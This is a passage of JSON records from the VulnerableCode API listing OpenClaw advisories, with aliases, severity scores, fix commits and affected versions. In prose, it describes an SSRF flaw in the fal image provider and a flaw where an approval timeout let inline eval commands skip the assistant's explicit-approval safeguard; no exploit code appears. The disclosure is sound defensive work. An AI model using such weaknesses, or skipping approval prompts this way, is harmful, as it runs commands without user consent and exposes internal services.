                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-34511",
                "GHSA-9jpj-g8vv-j5mf"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bgwh-spue-yybk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91210?format=api",
            "vulnerability_id": "VCID-bk76-1ctt-tkaw",
            "summary": "Duplicate Advisory: OpenClaw affected by SSRF via unguarded image download in fal provider\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qxgf-hmcj-3xw3. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-35cq-wv6v-88xf",
                    "reference_id": "GHSA-35cq-wv6v-88xf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-35cq-wv6v-88xf"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-35cq-wv6v-88xf"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bk76-1ctt-tkaw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90222?format=api",
            "vulnerability_id": "VCID-bkya-73v8-bber",
            "summary": "OpenClaw: strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts\n## Impact\n\nstrictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts.\n\nThe approval-timeout fallback could allow inline eval commands that strictInlineEval was meant to require explicit approval for.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42423",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17378",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17414",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17419",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42423"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42423",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42423"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q2gc-xjqw-qp89",
                    "reference_id": "GHSA-q2gc-xjqw-qp89",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-q2gc-xjqw-qp89"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42423",
                "GHSA-q2gc-xjqw-qp89"
            ],
            "risk_score": 3.5,
            "exploitability": "0.5",
            "weighted_severity": "6.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bkya-73v8-bber"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91507?format=api",
            "vulnerability_id": "VCID-bnfh-rsk9-cfea",
